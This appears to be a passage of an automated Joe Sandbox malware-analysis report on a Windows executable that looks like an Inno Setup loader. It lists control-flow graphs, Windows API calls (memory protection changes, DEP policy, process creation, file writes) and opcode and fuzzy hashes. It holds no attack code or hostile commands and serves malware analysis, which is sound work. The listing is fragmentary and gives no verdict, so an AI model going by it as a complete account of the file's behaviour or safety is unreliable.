Wow64DisableWow64FsRedirection 5357->5359 5360 408f9b 5358->5360 5359->5360 5360->5349 5362 408fb1 Wow64RevertWow64FsRedirection 5361->5362 5363 408fbb 5361->5363 5362->5363 5363->5079 5365 403566 5364->5365 5367 403578 5365->5367 5368 403604 5365->5368 5367->5092 5369 40357c 5368->5369 5374 40359b 5369->5374 5375 4035d0 5369->5375 5376 4035a0 5369->5376 5380 4035b6 5369->5380 5370 4035b1 5372 403198 4 API calls 5370->5372 5371 4035b8 5373 4031b8 4 API calls 5371->5373 5372->5380 5373->5380 5374->5376 5377 4035ec 5374->5377 5378 40357c 4 API calls 5375->5378 5375->5380 5376->5370 5376->5371 5379 403554 4 API calls 5377->5379 5377->5380 5378->5375 5379->5377 5380->5365 6671 401ab9 6672 401a96 6671->6672 6673 401aa9 RtlDeleteCriticalSection 6672->6673 6674 401a9f RtlLeaveCriticalSection 6672->6674 6674->6673

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 116 409b78-409b9c GetSystemInfo VirtualQuery 117 409ba2 116->117 118 409c2c-409c33 116->118 119 409c21-409c26 117->119 119->118 120 409ba4-409bab 119->120 121 409c0d-409c1f VirtualQuery 120->121 122 409bad-409bb1 120->122 121->118 121->119 122->121 123 409bb3-409bbb 122->123 124 409bcc-409bdd VirtualProtect 123->124 125 409bbd-409bc0 123->125 127 409be1-409be3 124->127 128 409bdf 124->128 125->124 126 409bc2-409bc5 125->126 126->124 129 409bc7-409bca 126->129 130 409bf2-409bf5 127->130 128->127 129->124 129->127 131 409be5-409bee call 409b70 130->131 132 409bf7-409bf9 130->132 131->130 132->121 134 409bfb-409c08 VirtualProtect 132->134 134->121
                                                                                            APIs
                                                                                            • GetSystemInfo.KERNEL32(?), ref: 00409B8A
                                                                                            • VirtualQuery.KERNEL32(00400000,?,0000001C,?), ref: 00409B95
                                                                                            • VirtualProtect.KERNEL32(?,?,00000040,?,00400000,?,0000001C,?), ref: 00409BD6
                                                                                            • VirtualProtect.KERNEL32(?,?,?,?,?,?,00000040,?,00400000,?,0000001C,?), ref: 00409C08
                                                                                            • VirtualQuery.KERNEL32(?,?,0000001C,00400000,?,0000001C,?), ref: 00409C18
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2980610205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2980587725.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2980638305.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2980665957.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Virtual$ProtectQuery$InfoSystem
                                                                                            • String ID:
                                                                                            • API String ID: 2441996862-0
                                                                                            • Opcode ID: 69cc1b0b9b744b29044eea84e4744ba7a66f7205e02ae19cc0529fdcfa929845
                                                                                            • Instruction ID: 4a1d84bb43d4a47cf168f169447d483ed62c711ee8ccb48f5bfbfd053dbeaed9
                                                                                            • Opcode Fuzzy Hash: 69cc1b0b9b744b29044eea84e4744ba7a66f7205e02ae19cc0529fdcfa929845
                                                                                            • Instruction Fuzzy Hash: D421A1B16043006BDA309AA99C85E57B7E8AF45360F144C2BFA99E72C3D239FC40C669
                                                                                            APIs
                                                                                            • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052D7,?,00000000,004053B6), ref: 0040522A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2980610205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2980587725.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2980638305.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2980665957.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: InfoLocale
                                                                                            • String ID:
                                                                                            • API String ID: 2299586839-0
                                                                                            • Opcode ID: 08facca5f8c818d7ae0117448837c5e97f15c9e55cb3aedc2694e0bc5091a832
                                                                                            • Instruction ID: 1248db9972fbf410c55bf070b604c98f5d62b90992f8f49b6b6440a9954d2c50
                                                                                            • Opcode Fuzzy Hash: 08facca5f8c818d7ae0117448837c5e97f15c9e55cb3aedc2694e0bc5091a832
                                                                                            • Instruction Fuzzy Hash: E2E0927170021427D710A9A99C86AEB725CEB58310F0002BFB904E73C6EDB49E804AED

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040A618), ref: 00404582
                                                                                            • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040458F
                                                                                            • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 004045A5
                                                                                            • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 004045BB
                                                                                            • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,0040A618), ref: 004045C6
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2980610205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2980587725.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2980638305.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2980665957.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$HandleModulePolicyProcess
                                                                                            • String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
                                                                                            • API String ID: 3256987805-3653653586
                                                                                            • Opcode ID: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
                                                                                            • Instruction ID: 1f393095ee8ecda9e1e01b6ca7d440447e938bbc9796bcd5dbe8d266940e5f64
                                                                                            • Opcode Fuzzy Hash: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
                                                                                            • Instruction Fuzzy Hash: 5FE02DD03813013AEA5032F20D83B2B20884AD0B49B2414377F25B61C3EDBDDA40587E

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • SetLastError.KERNEL32 ref: 0040AAC1
                                                                                              • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B244,?,021524A0), ref: 0040966C
                                                                                            • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040AAFE
                                                                                            • SetWindowLongA.USER32(0002043C,000000FC,00409960), ref: 0040AB15
                                                                                            • RemoveDirectoryA.KERNEL32(00000000,0040AC54,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040AC01
                                                                                            • DestroyWindow.USER32(0002043C,0040AC54,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040AC15
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2980610205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2980587725.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2980638305.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2980665957.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$ErrorLast$CreateDestroyDirectoryLongRemove
                                                                                            • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                                                            • API String ID: 3757039580-3001827809
                                                                                            • Opcode ID: 7bc9c0c8e9dfd2478b94306391eafe1fb51b7566d8199cdbb2b2653dcbc3d95c
                                                                                            • Instruction ID: 81987b3bab642c92fe87a7372e0454594c4b8fe140ce311e0f93b1eeebf6ab37
                                                                                            • Opcode Fuzzy Hash: 7bc9c0c8e9dfd2478b94306391eafe1fb51b7566d8199cdbb2b2653dcbc3d95c
                                                                                            • Instruction Fuzzy Hash: 25412E70604204DBDB10EBA9EE89B9E37A5EB44304F10467FF510B72E2D7B89855CB9D

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,0040A62C), ref: 004090C4
                                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090CA
                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,0040A62C), ref: 004090DE
                                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090E4
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2980610205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2980587725.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2980638305.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2980665957.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressHandleModuleProc
                                                                                            • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                                                            • API String ID: 1646373207-2130885113
                                                                                            • Opcode ID: 0414f1d66f28dc470df4633e5994336701384173b3f6f66b470f3ad827f759f7
                                                                                            • Instruction ID: 214dda5481ef482ebe311b1329301f35405b1013d97e3062c17ffb2c8286d57d
                                                                                            • Opcode Fuzzy Hash: 0414f1d66f28dc470df4633e5994336701384173b3f6f66b470f3ad827f759f7
                                                                                            • Instruction Fuzzy Hash: 21017C70748342AEFB00BB76DD4AB163A68E785704F60457BF640BA2D3DABD4C04D66E

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040AAFE
                                                                                            • SetWindowLongA.USER32(0002043C,000000FC,00409960), ref: 0040AB15
                                                                                              • Part of subcall function 00406B7C: GetCommandLineA.KERNEL32(00000000,00406BC0,?,?,?,?,00000000,?,0040AB86,?), ref: 00406B94
                                                                                              • Part of subcall function 004099EC: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,021524A0,00409AD8,00000000,00409ABF), ref: 00409A5C
                                                                                              • Part of subcall function 004099EC: CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,021524A0,00409AD8,00000000), ref: 00409A70
                                                                                              • Part of subcall function 004099EC: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A89
                                                                                              • Part of subcall function 004099EC: GetExitCodeProcess.KERNEL32(?,0040B244), ref: 00409A9B
                                                                                              • Part of subcall function 004099EC: CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,021524A0,00409AD8), ref: 00409AA4
                                                                                            • RemoveDirectoryA.KERNEL32(00000000,0040AC54,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040AC01
                                                                                            • DestroyWindow.USER32(0002043C,0040AC54,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040AC15
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2980610205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2980587725.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2980638305.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2980665957.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$CloseCreateHandleProcess$CodeCommandDestroyDirectoryExitLineLongMultipleObjectsRemoveWait
                                                                                            • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                                                            • API String ID: 3586484885-3001827809
                                                                                            • Opcode ID: c367800830601d7b7bb1e4b9cc729c69669d466ec6c890b8506752b9ad64910a
                                                                                            • Instruction ID: d3376fcde1141b4290a3dca450fc2844fa47922897975e075ebf06e3b6db64eb
                                                                                            • Opcode Fuzzy Hash: c367800830601d7b7bb1e4b9cc729c69669d466ec6c890b8506752b9ad64910a
                                                                                            • Instruction Fuzzy Hash: 77411A71604204DFD714EBA9EE85B5A37B5EB48304F20427BF500BB2E1D7B8A855CB9D

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,021524A0,00409AD8,00000000,00409ABF), ref: 00409A5C
                                                                                            • CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,021524A0,00409AD8,00000000), ref: 00409A70
                                                                                            • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A89
                                                                                            • GetExitCodeProcess.KERNEL32(?,0040B244), ref: 00409A9B
                                                                                            • CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,021524A0,00409AD8), ref: 00409AA4
                                                                                              • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B244,?,021524A0), ref: 0040966C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2980610205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2980587725.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2980638305.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2980665957.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseHandleProcess$CodeCreateErrorExitLastMultipleObjectsWait
                                                                                            • String ID: D
                                                                                            • API String ID: 3356880605-2746444292
                                                                                            • Opcode ID: aadf6f075de5bdb3c28d757ddccd10dd30f6bbfdbbad62eb54c24073370c977f
                                                                                            • Instruction ID: b58d0f6e2b8975977e6c7b71aada5392bea55c03070ce9fad3dcef5aa6d4018a
                                                                                            • Opcode Fuzzy Hash: aadf6f075de5bdb3c28d757ddccd10dd30f6bbfdbbad62eb54c24073370c977f
                                                                                            • Instruction Fuzzy Hash: EE1142B16402486EDB00EBE6CC42F9EB7ACEF49714F50013BB604F72C6DA785D048A69

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 136 401918-40193a RtlInitializeCriticalSection 137 401946-40197c call 4012dc * 3 LocalAlloc 136->137 138 40193c-401941 RtlEnterCriticalSection 136->138 145 4019ad-4019c1 137->145 146 40197e 137->146 138->137 149 4019c3-4019c8 RtlLeaveCriticalSection 145->149 150 4019cd 145->150 148 401983-401995 146->148 148->148 151 401997-4019a6 148->151 149->150 151->145
                                                                                            APIs
                                                                                            • RtlInitializeCriticalSection.KERNEL32(0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040192E
                                                                                            • RtlEnterCriticalSection.KERNEL32(0040C41C,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 00401941
                                                                                            • LocalAlloc.KERNEL32(00000000,00000FF8,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040196B
                                                                                            • RtlLeaveCriticalSection.KERNEL32(0040C41C,004019D5,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 004019C8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2980610205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2980587725.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2980638305.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2980665957.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                            • String ID:
                                                                                            • API String ID: 730355536-0
                                                                                            • Opcode ID: 38709c719971e1168baf9cdc3c67f999ad3db3ab521e9349fb3b390a12b3c6f3
                                                                                            • Instruction ID: 093a8b970c40f4dda7bd37408b901a2e20e4e29fb74a5496b56404d4d89a3717
                                                                                            • Opcode Fuzzy Hash: 38709c719971e1168baf9cdc3c67f999ad3db3ab521e9349fb3b390a12b3c6f3
                                                                                            • Instruction Fuzzy Hash: CC0161B0684240DEE715ABA999E6B353AA4E786744F10427FF080F62F2C67C4450CB9D

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 0040A878
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2980610205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2980587725.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2980638305.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2980665957.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Message
                                                                                            • String ID: .tmp$y@
                                                                                            • API String ID: 2030045667-2396523267
                                                                                            • Opcode ID: 55a53fbd7ad7285035f8ab2cde1915fb146aa3dc543cd9b52406218d685c1c98
                                                                                            • Instruction ID: 5e9257013af3d55ef2b6e359c41f87f67318ae2a4e6dbf07461b5d8c6de74657
                                                                                            • Opcode Fuzzy Hash: 55a53fbd7ad7285035f8ab2cde1915fb146aa3dc543cd9b52406218d685c1c98
                                                                                            • Instruction Fuzzy Hash: 3B41C030704200CFD311EF25DED1A1A77A5EB49304B214A3AF804B73E1CAB9AC11CBAD

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 0040A878
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2980610205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2980587725.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2980638305.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2980665957.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Message
                                                                                            • String ID: .tmp$y@
                                                                                            • API String ID: 2030045667-2396523267
                                                                                            • Opcode ID: 4e131503fe38447772e4e2294cf5373b7e2007f9fac8d76d0a71823c743fc64d
                                                                                            • Instruction ID: 95bba075cf9db07042691c1556ef0613dbe482a65a3614fff4d0ead14828e6f7
                                                                                            • Opcode Fuzzy Hash: 4e131503fe38447772e4e2294cf5373b7e2007f9fac8d76d0a71823c743fc64d
                                                                                            • Instruction Fuzzy Hash: E341BE30700200DFC711EF65DED2A1A77A5EB49304B104A3AF804B73E2CAB9AC01CBAD

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409376
                                                                                            • GetLastError.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040937F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2980610205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2980587725.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2980638305.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2980665957.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateDirectoryErrorLast
                                                                                            • String ID: .tmp
                                                                                            • API String ID: 1375471231-2986845003
                                                                                            • Opcode ID: 1c7982c9535877cc809d76a2290e1ec991a7408e90ad789d49a53b04ffd62ed2
                                                                                            • Instruction ID: b240cf9bc22f775501a2d99da134be40bb2f76fb21a7d6e050461713caae6e8b
                                                                                            • Opcode Fuzzy Hash: 1c7982c9535877cc809d76a2290e1ec991a7408e90ad789d49a53b04ffd62ed2
                                                                                            • Instruction Fuzzy Hash: 9E216774A00208ABDB05EFA1C8429DFB7B8EF88304F50457BE901B73C2DA3C9E058A65

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 342 407749-40774a 343 4076dc-4076e6 WriteFile 342->343 344 40774c-40776f 342->344 346 4076e8-4076ea call 40748c 343->346 347 4076ef-4076f2 343->347 345 407770-407785 344->345 348 407787 345->348 349 4077f9 345->349 346->347 351 407700-407704 347->351 352 4076f4-4076fb call 4073ec 347->352 353 40778a-40778f 348->353 354 4077fd-407802 348->354 355 40783b-40783d 349->355 356 4077fb 349->356 352->351 360 407803-407819 353->360 362 407791-407792 353->362 354->360 358 407841-407843 355->358 356->354 361 40785b-40785c 358->361 360->361 370 40781b 360->370 363 4078d6-4078eb call 407890 InterlockedExchange 361->363 364 40785e-40788c 361->364 365 407724-407741 362->365 366 407794-4077b4 362->366 387 407912-407917 363->387 388 4078ed-407910 363->388 380 407820-407823 364->380 381 407890-407893 364->381 369 4077b5 365->369 372 407743 365->372 366->369 374 4077b6-4077b7 369->374 375 4077f7-4077f8 369->375 376 40781e-40781f 370->376 378 407746-407747 372->378 379 4077b9 372->379 374->379 375->349 376->380 378->342 382 4077bb-4077cd 378->382 379->382 384 407824 380->384 385 407898 380->385 381->385 382->358 386 4077cf-4077d4 382->386 389 407825 384->389 390 40789a 384->390 385->390 386->355 394 4077d6-4077de 386->394 388->387 388->388 392 407896-407897 389->392 393 407826-40782d 389->393 395 40789f 390->395 392->385 396 4078a1 393->396 397 40782f 393->397 394->345 405 4077e0 394->405 395->396 402 4078a3 396->402 403 4078ac 396->403 399 407832-407833 397->399 400 4078a5-4078aa 397->400 399->355 399->376 404 4078ae-4078af 400->404 402->400 403->404 404->395 406 4078b1-4078bd 404->406 405->375 406->385 407 4078bf-4078c0 406->407
                                                                                            APIs
                                                                                            • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2980610205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2980587725.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2980638305.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2980665957.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileWrite
                                                                                            • String ID:
                                                                                            • API String ID: 3934441357-0
                                                                                            • Opcode ID: 43d3196ec1ce5242573e8f450cfa6a0a1bc6604aabb0088ea34051851cbbaa4a
                                                                                            • Instruction ID: 20d0a63744b7af467993d3e8aec565234b7be2d060ba20bf9fd199bb98bd5a4e
                                                                                            • Opcode Fuzzy Hash: 43d3196ec1ce5242573e8f450cfa6a0a1bc6604aabb0088ea34051851cbbaa4a
                                                                                            • Instruction Fuzzy Hash: 8251D12294D2910FC7126B7849685A53FE0FE5331132E92FBC5C1AB1A3D27CA847D35B

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 408 401fd4-401fe6 409 401fe8 call 401918 408->409 410 401ffb-402010 408->410 414 401fed-401fef 409->414 412 402012-402017 RtlEnterCriticalSection 410->412 413 40201c-402025 410->413 412->413 415 402027 413->415 416 40202c-402032 413->416 414->410 417 401ff1-401ff6 414->417 415->416 418 402038-40203c 416->418 419 4020cb-4020d1 416->419 420 40214f-402158 417->420 423 402041-402050 418->423 424 40203e 418->424 421 4020d3-4020e0 419->421 422 40211d-40211f call 401ee0 419->422 426 4020e2-4020ea 421->426 427 4020ef-40211b call 402f54 421->427 431 402124-40213b 422->431 423->419 428 402052-402060 423->428 424->423 426->427 427->420 429 402062-402066 428->429 430 40207c-402080 428->430 433 402068 429->433 434 40206b-40207a 429->434 436 402082 430->436 437 402085-4020a0 430->437 440 402147 431->440 441 40213d-402142 RtlLeaveCriticalSection 431->441 433->434 439 4020a2-4020c6 call 402f54 434->439 436->437 437->439 439->420 441->440
                                                                                            APIs
                                                                                            • RtlEnterCriticalSection.KERNEL32(0040C41C,00000000,00402148), ref: 00402017
                                                                                              • Part of subcall function 00401918: RtlInitializeCriticalSection.KERNEL32(0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040192E
                                                                                              • Part of subcall function 00401918: RtlEnterCriticalSection.KERNEL32(0040C41C,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 00401941
                                                                                              • Part of subcall function 00401918: LocalAlloc.KERNEL32(00000000,00000FF8,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040196B
                                                                                              • Part of subcall function 00401918: RtlLeaveCriticalSection.KERNEL32(0040C41C,004019D5,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 004019C8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2980610205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2980587725.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2980638305.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2980665957.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$Enter$AllocInitializeLeaveLocal
                                                                                            • String ID:
                                                                                            • API String ID: 296031713-0
                                                                                            • Opcode ID: e41243de7c80276a36dcdd2c2c0e451bb1a6f3055e5ddec7aea90b49354f7273
                                                                                            • Instruction ID: b272be6629c35a549fc4f1c5a19e6e0df2414f51bb24a7fd7fb800939d1160d0
                                                                                            • Opcode Fuzzy Hash: e41243de7c80276a36dcdd2c2c0e451bb1a6f3055e5ddec7aea90b49354f7273
                                                                                            • Instruction Fuzzy Hash: D4419CB2A40711DFDB108F69DEC562A77A0FB58314B25837AD984B73E1D378A842CB48

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 444 406fa0-406ff3 SetErrorMode call 403414 LoadLibraryA
